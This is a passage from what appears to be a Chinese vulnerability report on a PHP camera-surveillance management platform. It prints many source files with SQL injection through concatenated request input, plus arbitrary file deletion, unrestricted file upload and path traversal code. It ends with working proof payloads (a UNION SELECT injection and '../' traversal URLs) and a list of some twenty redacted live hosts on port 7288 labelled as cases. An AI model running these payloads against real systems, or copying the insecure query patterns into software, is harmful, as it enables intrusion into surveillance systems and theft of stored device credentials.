	$unitCode = $_POST['unitCode'];
	if($isEmpty){
		saveUserInfo($name,$password,$realName,$phone,$eMail,$roleId,$unitCode);
	}else{
		updateUserInfo($_POST['userId'],$name,$password,$realName,$phone,$eMail,$roleId,$unitCode);
	}
	
}
function deleteUserInfo($userIds){
		$dbQuery = new DataBaseQuery();
		$query = $dbQuery->execute("delete from user_info where userId in(".$userIds.")");
		if ($query) {
			echo "0";
		}else{
			echo "1";
		}
		$dbQuery->closeDb();
}
function saveUserInfo($name,$password,$realName,$phone,$eMail,$roleId,$unitCode){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		if($password != $password_old){
			$query = $dbQuery->execute('insert into user_info values (NULL,"'.$name.'","'.$password.'","'.$unitCode.'","'.$realName.'","'.$phone.'","'.$eMail.'",'.$roleId.',"'.$time.'","1")');
		}
		else{
			$query = $dbQuery->execute('insert into user_info values (NULL,"'.$name.'","","'.$unitCode.'","'.$realName.'","'.$phone.'","'.$eMail.'",'.$roleId.',"'.$time.'","1")');
		}
		if ($query) {
			echo $dbQuery->lastInsertRowID();
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
		
}
function updateUserInfo($userId,$name,$password,$realName,$phone,$eMail,$roleId,$unitCode){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		if($password != $password_old){
			$query = $dbQuery->execute('update user_info set name="'.$name.'",password="'.$password.'",unitCode="'.$unitCode.'",realName="'.$realName.'",phone="'.$phone.'",eMail="'.$eMail.'",roleId='.$roleId.',updataTime="'.$time.'" where userId='.$userId);
		}
		else{
			$query = $dbQuery->execute('update user_info set name="'.$name.'",unitCode="'.$unitCode.'",realName="'.$realName.'",phone="'.$phone.'",eMail="'.$eMail.'",roleId='.$roleId.',updataTime="'.$time.'" where userId='.$userId);
		}
		if ($query) {
			echo $userId;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
}
?>


第二十五处:/data/fetchCameraInfo.php

<?php	
		include('../common/connDb.php');
		include('../common/unitCode.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$sort=$_POST['sort'];
		$order=$_POST['order'];	
		$start=($page -1)*$rows;
		$name=@$_POST['name'];
		$organize=@$_POST['organize'];
		$group=@$_POST['group'];
		$configFlag=@$_POST['configFlag'];
		$whereStr="";
		if($name != ""){
			if($name=="." || $name=="%" || $name=="_"){
				$name ="[".$name."]";
			}
			$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%' or c.name like '%".$name."%')";
		}
		if($organize != ""){
			if($organize =="0"){ //如果是主控制中心则查询全部
			}else{
				if(strlen($organize)==8){//如果是派出所级别
					$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
				}else{
					$qxCode = substr($organize,4,2);
					$shiCode = substr($organize,2,2);
					$shengCode = substr($organize,0,2);
					if($shiCode=="00" && $qxCode=="00"){  //如果是省
						$whereStr =" and d.indexcode like '".$shengCode."%' and d.ctrl_unit_id<>1";
					}else if($shiCode !="00" && $qxCode=="00"){  //如果是市
						$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%' and d.ctrl_unit_id<>1";
					}else{
						$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
					}
				}
				
			}	
		}
		if($group != ""){
			if($group=="-1"){
			}else{
				$whereStr =" and d.group_id =".$group;
			}	
		}
		if($configFlag == "1"){
			$whereStr =" and (c.is_transform is null or c.is_transform=0)";
		}else if($configFlag == "2"){
			$whereStr =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
		}
		$re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,c.is_transform transform,c.is_stream_transmit streamTransmit,d.status,d.id deviceId,c.local_num num,d.reg_type regType,d.indexcode devIndexCode,d.type_code typeCode,d.username,d.password,d.id deviceId from camera_info c,device_info d where c.device_indexcode=d.indexcode'.$unitWhere.$whereStr.' order by d.id '.$order.' limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from camera_info c,device_info d where c.device_indexcode=d.indexcode'.$unitWhere.$whereStr);
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第二十六处:/data/fetchDeviceType.php

<?php	
		/*
			根据typeCode找出设备类型
		*/
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$typeCode=$_POST['typeCode'];
		$typeCodeArray = $dbQuery->querySingleRow('select type_code typeCode,name,manufacturer,register_type registerType,access_type accessType,equipment_type equipmentType,plugin_id pluginId,int_rev port,str_rev cName from device_type_info where type_code='.$typeCode,true);
		$dbQuery->closeDb();
		echo(json_encode($typeCodeArray));
?>


第二十七处:/data/saveGroup.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
$groupIds = @$_POST['groupIds'];
$groupId= @$_POST['groupId'];
$name= @$_POST['name'];
if($operate=="delete"){  //如果是删除操作
	deleteGroup($groupIds);
}else if($operate=="add"){ //如果是增加操作
	saveGroup($name);
}else{  //如果是修改操作
	updateGroup($groupId,$name);
}
function deleteGroup($groupIds){
		$dbQuery = new DataBaseQuery();
		$query1 = $dbQuery->execute("update device_info set group_id=0 where group_id in(".$groupIds.")");
		$query2 = $dbQuery->execute("delete from device_group_info where id in(".$groupIds.")");
		if ($query1 && $query2) {
			echo "0";
		}else{
			echo "1";
		}
		$dbQuery->closeDb();
}
function saveGroup($name){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('insert into device_group_info values(NULL,"'.$name.'","'.$time.'",0,"")');
		if ($query) {
			echo $dbQuery->lastInsertRowID();
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
		
}
function updateGroup($groupId,$name){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('update device_group_info set name="'.$name.'",update_time="'.$time.'" where id='.$groupId);
		if ($query) {
			echo $groupId;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
}
?>


第二十八处:/data/saveRoleInfo.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){  //如果是删除操作
	$roleIds = $_POST['roleIds'];
	deleteRoleInfo($roleIds);
}else{  //如果是增加或者修改操作
	$isEmpty=empty($_POST['roleId']);
	$name=$_POST['name'];
	$description = $_POST['description'];
	$menuIds = $_POST['menuIds'];
	if($isEmpty){
		saveRoleInfo($name,$description,$menuIds);
	}else{
		updateRoleInfo($_POST['roleId'],$name,$description,$menuIds);
	}
	
}
function deleteRoleInfo($roleIds){
		$dbQuery = new DataBaseQuery();
		$query1 = $dbQuery->execute("delete from user_info where roleId in(".$roleIds.")");//先删除关联该角色的用户
		$query2 = $dbQuery->execute("delete from role_info where roleId in(".$roleIds.")");//再删除角色
		if ($query1 && $query2) {
			echo "0";
		}else{
			echo "1";
		}
		$dbQuery->closeDb();
}
function saveRoleInfo($name,$description,$menuIds){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('insert into role_info values (NULL,"'.$name.'","'.$description.'","'.$menuIds.'","'.$time.'","")');
		if ($query) {
			echo $dbQuery->lastInsertRowID();
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
		
}
function updateRoleInfo($roleId,$name,$description,$menuIds){
		$dbQuery = new DataBaseQuery();
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$query = $dbQuery->execute('update role_info set name="'.$name.'",description="'.$description.'",menuIds="'.$menuIds.'",updataTime="'.$time.'" where roleId='.$roleId);
		if ($query) {
			echo $roleId;
		}else{
			echo 0;
		}
		$dbQuery->closeDb();
}
?>


第二十九处:/data/roleInfoData.php

<?php	
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$start=($page -1)*$rows;
		$re = $dbQuery->query('select * from role_info limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from role_info');
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


第三十处:/data/shareDeviceInfo.php

<?php
	include('../common/connDb.php');
	$operate = $_POST['operate'];
	$deviceIds = @$_POST['deviceIds'];
	$unitId = @$_POST['unitId'];
	$groupId = @$_POST['groupId'];
	$dbQuery = new DataBaseQuery();
	if($operate=="share"){  //如果是指定勾选共享
		shareDeviceInfo($dbQuery,$deviceIds,$unitId);
	}else{  //如果是全部共享
		shareAllDeviceInfo($dbQuery,$groupId,$unitId);
	}
	$dbQuery->closeDb();
	function shareDeviceInfo($dbQuery,$deviceIds,$unitId){
			$query = $dbQuery->execute('update device_info set ctrl_unit_id='.$unitId.' where id in('.$deviceIds.')');
			if ($query) {
				echo 0;
			}else{
				echo 1;
			}
	}
	function shareAllDeviceInfo($dbQuery,$groupId,$unitId){
		$query = $dbQuery->execute('update device_info set ctrl_unit_id='.$unitId.' where group_id ='.$groupId);
		if ($query) {
			echo 0;
		}else{
			echo 1;
		}
	}
?>


第三十一处:/data/modifyCameraName.php

<?php
	include('../common/connDb.php');
	$deviceId=$_POST['deviceId'];
	$channelNum=$_POST['channelNum'];
	$cameraName=$_POST['cameraName'];
	$dbQuery = new DataBaseQuery();
	$dbQuery->execute('update camera_info set name="'.$cameraName.'" where device_id='.$deviceId.' and local_num ='.$channelNum);
	$dbQuery->closeDb();
	echo "0";
?>


第三十二处:/data/saveDeviceInfo.php

<?php
include('../common/connDb.php');
$obj=$_POST['obj'];
$analog_chan_count = $_POST['analog_chan_count'];
$digital_chan_count = $_POST['digital_chan_count'];
$alarm_in_count = $_POST['alarm_in_count'];
$alarm_out_count = $_POST['alarm_out_count'];
$audio_num = $_POST['audio_num'];
$dbQuery = new DataBaseQuery();
$xml = simplexml_load_file('../../../pagconf.xml');
$pagIndexCode = $xml->pag->indexCode;
if($obj=="singleIp"){  //如果是单IP添加
	$singleIp_addr = $_POST['singleIp_addr'];
	$singleIp_port = $_POST['singleIp_port'];
	$singleIp_username = $_POST['singleIp_username'];
	$singleIp_password = $_POST['singleIp_password'];
	$singleIp_typecode = $_POST['singleIp_typecode'];
	$singleIp_groupId = $_POST['singleIp_groupId'];
	$singleIp_controlUnit = $_POST['singleIp_controlUnit'];
	$singleIp_indexcode = getIndexCode($dbQuery,$singleIp_controlUnit);
	$name = $_POST['name'];
	if($name==""){
		$name = $singleIp_addr;
	}
	$serialnum = $_POST['serialnum'];
	$singleIp_allowShare = $_POST['singleIp_allowShare'];
	$reg_type = 0;  //注册类型-0 被动
	$deviceId = saveDeviceInfo($dbQuery,$singleIp_addr,$singleIp_port,$singleIp_username,$singleIp_password,$singleIp_typecode,$singleIp_indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$singleIp_groupId,$singleIp_allowShare,$singleIp_controlUnit);
	echo $singleIp_indexcode;
}else if($obj=="ipDomain"){ //如果是IP段添加
	$ipDomain_startIp = $_POST['ipDomain_startIp'];
	$ipDomain_endIp = $_POST['ipDomain_endIp'];
	$ipDomain_typecode = $_POST['ipDomain_typecode'];
	$ipDomain_port = $_POST['ipDomain_port'];
	$ipDomain_username = $_POST['ipDomain_username'];
	$ipDomain_password = $_POST['ipDomain_password'];
	$ipDomain_groupId = $_POST['ipDomain_groupId'];
	$ipDomain_controlUnit = $_POST['ipDomain_controlUnit'];
	$ipDomain_allowShare = $_POST['ipDomain_allowShare'];
	$reg_type = 0;  //注册类型-0 被动
	$deviceIndexCodes ="";
	$ipArray = ipMiddle($ipDomain_startIp,$ipDomain_endIp);
	for($i=0;$i<count($ipArray);$i++){
		$newIndexCode = getIndexCode($dbQuery,$ipDomain_controlUnit);
		$deviceId = saveDeviceInfo($dbQuery,$ipArray[$i],$ipDomain_port,$ipDomain_username,$ipDomain_password,$ipDomain_typecode,$newIndexCode,$ipArray[$i],"",$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$ipDomain_groupId,$ipDomain_allowShare,$ipDomain_controlUnit);
		if($i==0){
			$deviceIndexCodes = $newIndexCode;
		}else{
			$deviceIndexCodes = $deviceIndexCodes.",".$newIndexCode;
		}		
	}
	echo $deviceIndexCodes;
}else if($obj=="singleCode"){ //如果是单编号添加
	$singleCode_typecode = $_POST['singleCode_typecode'];
	$singleCode_indexcode = $_POST['singleCode_indexcode'];
	$singleCode_groupId = $_POST['singleCode_groupId'];
	$singleCode_controlUnit = $_POST['singleCode_controlUnit'];
	$name = $_POST['name'];
	if($name==""){
		$name = "DEVICE_".$singleCode_indexcode;
	}
	$serialnum = $_POST['serialnum'];
	$singleCode_allowShare = $_POST['singleCode_allowShare'];
	$reg_type = 4;  //注册类型-0 主动
	$deviceId = saveDeviceInfo($dbQuery,"**.**.**.**",8000,"admin","12345",$singleCode_typecode,$singleCode_indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$singleCode_groupId,$singleCode_allowShare,$singleCode_controlUnit);
	echo $singleCode_indexcode;
}else{ //如果是编号段添加
	$codeDomain_typecode = $_POST['codeDomain_typecode'];
	$codeDomain_preIndexCode = $_POST['codeDomain_preIndexCode'];
	$codeDomain_startCode = $_POST['codeDomain_startCode'];
	$codeDomain_endCode = $_POST['codeDomain_endCode'];
	$codeDomain_groupId = $_POST['codeDomain_groupId'];
	$codeDomain_allowShare = $_POST['codeDomain_allowShare'];
	$codeDomain_controlUnit = $_POST['codeDomain_controlUnit'];
	
	$reg_type = 4;  //注册类型-0 主动
	$deviceIndexCodes ="";
	$codeDomain_CodeLength = strlen($codeDomain_endCode);
	$indexCodeArray = generateSegmentIndexCode($codeDomain_preIndexCode,intval($codeDomain_startCode),intval($codeDomain_endCode), $codeDomain_CodeLength);
	for($i=0;$i<count($indexCodeArray);$i++){
		$name = "DEVICE_".$indexCodeArray[$i];
		$deviceId = saveDeviceInfo($dbQuery,"**.**.**.**",8000,"admin","12345",$codeDomain_typecode,$indexCodeArray[$i],$name,"",$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$codeDomain_groupId,$codeDomain_allowShare,$codeDomain_controlUnit);
		if($i==0){
			$deviceIndexCodes = $indexCodeArray[$i];
		}else{
			$deviceIndexCodes = $deviceIndexCodes.",".$indexCodeArray[$i];
		}		
	}
	echo $deviceIndexCodes;
}
$dbQuery->closeDb();
function saveDeviceInfo($dbQuery,$addr,$port,$username,$password,$typecode,$indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$groupId,$allowShare,$singleIp_controlUnit){
		$seq = $dbQuery->querySingle('select seq from sqlite_sequence where name="device_info"');
		$str="";
		if($seq==null || $seq==""){
			$str = "1";
		}else{
			$str = strval($seq+1);
		}
		while(strlen($str)<12){
			$str="0".$str;
		}
		$dev_guid=$pagIndexCode.$str;
		date_default_timezone_set('PRC');
		$time = date('Y-m-d H:i:s',time());
		$ctrl_unit_id = "";
		if($singleIp_controlUnit=="0"){
			$ctrl_unit_id = "1";
		}else{
			$ctrl_unit_id = "0";
		}
		$query = $dbQuery->execute('insert into device_info(id,dev_guid,indexcode,name,type_code,reg_type,network_addr,network_port,username,password,group_id,serial_num,alarm_in_count,alarm_out_count,analog_chan_count,digital_chan_count,audio_num,update_time,allow_share,ctrl_unit_id) values (NULL,"'.$dev_guid.'","'.$indexcode.'","'.$name.'",'.$typecode.','.$reg_type.',"'.$addr.'",'.$port.',"'.$username.'","'.$password.'",'.$groupId.',"'.$serialnum.'",'.$alarm_in_count.','.$alarm_out_count.','.$analog_chan_count.','.$digital_chan_count.','.$audio_num.',"'.$time.'",'.$allowShare.','.$ctrl_unit_id.')');
		if ($query) {
			return $dbQuery->lastInsertRowID();
		}else{
			return "";
		}		
}
function ipMiddle($ipDomain_startIp,$ipDomain_endIp){
	$ipDomain_startIp = trim($ipDomain_startIp);
	$ipDomain_endIp = trim($ipDomain_endIp);
	$startIpArray = explode(".",$ipDomain_startIp);
	$endIpArray = explode(".",$ipDomain_endIp);
	$start0 = intval(trim($startIpArray[0]));
	$start1 = intval(trim($startIpArray[1]));
	$start2 = intval(trim($startIpArray[2]));
	$start3 = intval(trim($startIpArray[3]));
	$end0 = intval(trim($endIpArray[0]));
	$end1 = intval(trim($endIpArray[1]));
	$end2 = intval(trim($endIpArray[2]));
	$end3 = intval(trim($endIpArray[3]));
	$result = array();
	// 如果起始IP地址和结束IP地址不等
	while(!($start0 == $end0 && $start1 == $end1 && $start2 == $end2 && $start3 == $end3)){
		$candidate = $start0.".".$start1.".".$start2.".".$start3;
		// 把起始地址放入数组中
		array_push($result,$candidate);
		// 起始地址加1
		$start3 = $start3 + 1;
		if($start3 == 256){
			$start3 = 0;
			$start2 = $start2 + 1;
			if($start2 == 256){
				$start2 = 0;
				$start1 = $start1 + 1;
				if($start1 == 256){
					$start1 = 0;
					$start0 = $start0 + 1;
				}
			}
		}
	}
	// 如果退出循环,起始IP地址和结束IP地址相等
	array_push($result,$ipDomain_endIp);
	return $result;
}
function getIndexCode($dbQuery,$controlUnit){
	$preIndex="";
	$xml = simplexml_load_file('../common/codeConfig.xml');
	$areaCode = strval($xml->areaCode);
	$netMark = strval($xml->netMark);
	$version = simplexml_load_file('../../../version.xml');
	$platformCode = strval($version->Code);
	$codeProtocol = strval($version->CodeProtocol);		//DB33  GB28181
	if($controlUnit=="0"){
		date_default_timezone_set('PRC');
		$controlUnit = date('ymd',time());
	}
	if($codeProtocol == 'DB33'){//18bit
		if(strlen($controlUnit)==8){
			$preIndex = $controlUnit."00".$platformCode;
		}else{
			$preIndex = $controlUnit."0000".$platformCode;
		}
		$indexCode="";
		$existCount = 0;
		do{
			$indexCode = $preIndex.getrndnum(4)."00";
			$existCount = $dbQuery->querySingle('select count(*) from device_info where indexcode="'.$indexCode.'"');
		}while($existCount>0);
		return $indexCode;
	}else{
		if(strlen($controlUnit)==8){
			$preIndex = $controlUnit."00".$areaCode.$netMark.$platformCode;
		}else{
			$preIndex = $controlUnit."0000".$areaCode.$netMark.$platformCode;
		}
		$indexCode="";
		$existCount = 0;
		do{
			$indexCode = $preIndex.getrndnum(4);
			$existCount = $dbQuery->querySingle('select count(*) from device_info where indexcode="'.$indexCode.'"');
		}while($existCount>0);
		return $indexCode;
	}
	
}
function getrndnum($length=6) {
	$hash = '';
	$chars = '0123456789';
	$max = strlen($chars) - 1;
	mt_srand((double)microtime() * 1000000);
	for($i = 0; $i < $length; $i++){
		$hash .= $chars[mt_rand(0, $max)];
	}
	return $hash;
}
function generateSegmentIndexCode($preIndexCode,$startIndexCode,$endIndexCode,$codeDomain_CodeLength){
	$indexCodeArray = array();
	if ($startIndexCode <= $endIndexCode) {
		$version = simplexml_load_file('../../../version.xml');
		$codeProtocol = strval($version->CodeProtocol);		//DB33  GB28181
		$length = $codeDomain_CodeLength;//strlen(strval($endIndexCode));
		for($i = $startIndexCode;$i<= $endIndexCode;$i++){
			$code = strval($i);
			$code = str_repeat("0", $length-strlen($code)).$code;
			/*if($codeProtocol == 'DB33'){
				if(strlen($code)<6){
					$code = str_repeat("0", 6-strlen($code)).$code;
				}
			}else{
				if(strlen($code)<4){
					$code = str_repeat("0", 4-strlen($code)).$code;
				}
			}*/
			$code = $preIndexCode.$code;
			array_push($indexCodeArray,$code);
		}
	}
	return $indexCodeArray;
}

漏洞证明:

第三十三处:/data/deviceAndCameraListData.php

include('../common/connDb.php');
		include('../common/unitCode.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$sort=$_POST['sort'];
		$order=$_POST['order'];
		$start=($page -1)*$rows;
		$name=@$_POST['name'];
		$organize=@$_POST['organize'];
		$group=@$_POST['group'];
		$configFlag=@$_POST['configFlag'];
		$type=@$_GET['type'];
		$deviceIndexCode = @$_GET['deviceIndexCode'];
		$deviceId = @$_GET['deviceId'];
		$show = @$_GET['show'];
		if($type =="device"){
			$whereStr="";
			if($name != ""){
				if($name=="." || $name=="%" || $name=="_"){
					$name ="[".$name."]";
				}
				$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
			}
			if($organize != ""){
				if($organize =="0"){ //如果是主控制中心则查询全部
				}else{
					if(strlen($organize)==8){//如果是派出所级别
						$whereStr =" and d.indexcode like '".$organize."%'";
					}else{
						$qxCode = substr($organize,4,2);
						$shiCode = substr($organize,2,2);
						$shengCode = substr($organize,0,2);
						if($shiCode=="00" && $qxCode=="00"){  //如果是省
							$whereStr =" and d.indexcode like '".$shengCode."%'";
						}else if($shiCode !="00" && $qxCode=="00"){  //如果是市
							$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
						}else{
							$whereStr =" and d.indexcode like '".$organize."%'";
						}
					}
					
				}	
			}
			if($group != ""){
				if($group=="-1"){
				}else{
					$whereStr =" and d.group_id =".$group;
				}	
			}
			$str="";
			if($configFlag == "1"){
				$str =" and (c.is_transform is null or c.is_transform=0)";
			}else if($configFlag == "2"){
				$str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
			}
			$re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
			$jsonArray = array();
			
			
			$count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
			while ($row = $dbQuery->fetchArray($re)){
				$pNode = new TreeNode();
				$pNode->setId('device_'.$row['id']);
				$pNode->setName($row['name']);
				$pNode->setTypeCode($row['type_code']);
				$pNode->setDeviceType($row['deviceType']);
				$pNode->setRegType($row['regType']);
				$pNode->setNetworkAddr($row['networkAddr']);
				$pNode->setNetworkPort($row['networkPort']);
				$pNode->setStatus($row['status']);
				$pNode->setType($row['type']);
				$pNode->setNum(0);
				$pNode->setIndexCode($row['indexcode']);
				$pNode->setUserName($row['username']);
				$pNode->setPassword($row['password']);
				$pNode->setIsTransform('/');
				$pNode->setIsStreamTransform('/');
				$pNode->setParentId("");
				$pNode->setState('closed');
				$pNode->setChecked(false);
				$pNode->setIconCls('icon-deviceManage');
				//fetchCameraByDeviceId($dbQuery,$row['indexcode'],$pNode,$row['id'],$configFlag);
				array_push($jsonArray,$pNode);
			}
			
			$str ='{"total":'.$count.',"rows":'.json_encode($jsonArray).'}';
			$dbQuery->closeDb();
			echo $str;
		}else{
			fetchCameraByDeviceId($dbQuery,$deviceIndexCode,$deviceId,$show);
		}
		
		
		function fetchCameraByDeviceId($dbQuery,$deviceIndexCode,$deviceId,$show){
			$whereStr ="";
			if($show == "1"){
				$whereStr =" and (a.is_transform is null or a.is_transform=0)";
			}else if($show == "2"){
				$whereStr =" and (a.is_stream_transmit is null or a.is_stream_transmit=0)";
			}
			$re = $dbQuery->query('select a.id,a.name,"/" deviceType,"/" regType,"/" networkAddr,"/" networkPort,b.status,"camera" type,a.local_num num,a.indexcode,a.is_transform transform,a.is_stream_transmit streamTransmit from camera_info a,device_info b where a.device_indexcode=b.indexcode and a.device_indexcode="'.$deviceIndexCode.'"'.$whereStr);
			$jsonArray = array();
			while ($row = $dbQuery->fetchArray($re)){
				$cNode = new TreeNode();
				$cNode->setId('camera_'.$row['id']);
				$cNode->setName($row['name']);
				$cNode->setTypeCode(0);
				$cNode->setDeviceType($row['deviceType']);
				$cNode->setRegType($row['regType']);
				$cNode->setNetworkAddr($row['networkAddr']);
				$cNode->setNetworkPort($row['networkPort']);
				$cNode->setStatus($row['status']);
				$cNode->setChecked(false);
				$cNode->setType($row['type']);
				$cNode->setNum($row['num']);
				$cNode->setIndexCode($row['indexcode']);
				$cNode->setUserName("");
				$cNode->setPassword("");
				$cNode->setIsTransform($row['transform']);
				$cNode->setIsStreamTransform($row['streamTransmit']);
				$cNode->setIconCls('icon-camera');
				$cNode->setParentId($deviceId);
				array_push($jsonArray,$cNode);
			}
			$str =json_encode($jsonArray);
			$dbQuery->closeDb();
			echo $str;
		}
?>


第三十四处:/data/groupListData.php

<?php	
		include('../common/connDb.php');
		$dbQuery = new DataBaseQuery();
		$page=$_POST['page']; 
		$rows=$_POST['rows'];
		$start=($page -1)*$rows;
		$re = $dbQuery->query('select * from device_group_info limit '.$start.','.$rows);
		$count = $dbQuery->querySingle('select count(*) from device_group_info');
		$jsonStr ="";
		while ($row = $dbQuery->fetchArray($re)){
			$jsonStr = $jsonStr.json_encode($row).",";
		}
		if($jsonStr !=""){
			$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
		}
		$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
		$dbQuery->closeDb();
		echo ($str);
?>


任意文件生成:/data/deletePlugFiles.php

<?php
	include('../common/connDb.php');
	$dirName = $_POST['dirName'];
	$fileName = $_POST['fileName'];
	$filePath = '../../../../plugins/'.$dirName.'/'.$fileName;
	if (file_exists($filePath)) {
		$result=unlink($filePath);
		if($result){
			echo 0;
		}else{
			echo 1;
		}
	}else{
		echo 1;
	}
?>


任意文件上传:

<?php
	include('../common/connDb.php');
	$foldName = $_POST['foldName'];
	$foldPath = '../../../../plugins/'.$foldName;
	if(!file_exists($foldPath)){
		mkdir($foldPath,0777);  
	}
	$plugFiles = $_FILES['plugFile'];
	for($i=0;$i<count($plugFiles['name']);$i++){
		//如果未出错
		if($_FILES['plugFile']['error'][$i]==0){
			 if(!move_uploaded_file($_FILES['plugFile']['tmp_name'][$i],$foldPath."/".$_FILES['plugFile']['name'][$i])){
				 echo 1;
				 return;
			 }
		}
	}
	echo 0;
?>


任意目录遍历:/remoteUpdate/showFile.php

<?php
	$dirName = $_GET['fileName'];  //插件文件夹
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://**.**.**.**/TR/html4/loose.dtd">
<html>
<head>
	<link rel="stylesheet" type="text/css" href="../easyui/themes/default/easyui.css">  
	<link rel="stylesheet" type="text/css" href="../easyui/themes/icon.css">  
	<link rel="stylesheet" type="text/css" href="../easyui/themes/particular_blue.css">
	
	<script type="text/javascript" src="../easyui/jquery-1.4.4.min.js"></script>
	<script type="text/javascript" src="../easyui/jquery.easyui.min.js"></script>
	<script type="text/javascript" src="../easyui/locale/easyui-lang-zh_CN.js"></script>
	<script type="text/javascript" src="../easyui/easyloader.js"></script>
	<title>查看插件明细</title>
	<script>
		$(function(){
			$('#tree').tree({
				animate:true,
				lines:true,
				url:'../data/fetchPlugJsonByFolder.php?dirName=<?php echo $dirName;?>',
				onContextMenu: function(e, node){
					if(node.iconCls !="icon-plugFold"){
						e.preventDefault();
						$('#tree').tree('select', node.target);
						$('#mmt').menu('show', {
							left: e.pageX,
							top: e.pageY
						});
					}		
				}
			});
			$('#delete').click(function(){
				parent.$.messager.confirm('确认框', '您确定要删除?', function(r){
					if (r){
						var fileName=$('#tree').tree('getSelected').id;
						$.ajax({
							type: "POST",
							url: "../data/deletePlugFiles.php",
							data: "dirName=<?php echo $dirName;?>&fileName="+fileName,
							success: function(msg){
								if(msg=="0"){
									$('#tree').tree('reload');
								}else{
									parent.$.messager.alert('提示','删除失败!','error');
								}
							}
						});
						
					}


任意文件遍历:/serverLog/showFile.php

<?php
					$file_name = $_GET['fileName'];
					$file_path = '../../../log/'.$file_name;
					$fp = fopen($file_path, "r");
					while($line = fgets($fp)){
						$line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
						echo '<span style="font-size:16px">'.$line.'</span>';
					}
					fclose($fp);
				?>


任意文件遍历:
**.**.**.**:7288/serverLog/showFile.php?fileName=../web/html/serverLog/showFile.php

aaaaaaaaaaaaaaaaaaa4444444444444444444444.jpg


随便手工验证一处注入:
**.**.**.**:7288/transformServer/serverConfigInfo.php?transId=1 union select 1,2,3,(select GROUP_CONCAT(1,2) from camera_info),5,6,7,8,9,10,11,12,13,14--

aaaaaaaaaaaaaaaaaaaa333333333333333333333.jpg


目录遍历:
**.**.**.**:7288/remoteUpdate/showFile.php?fileName=../../../

aaaaaaaaaaaaaaaa55555555555555555555.jpg


案例:

**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
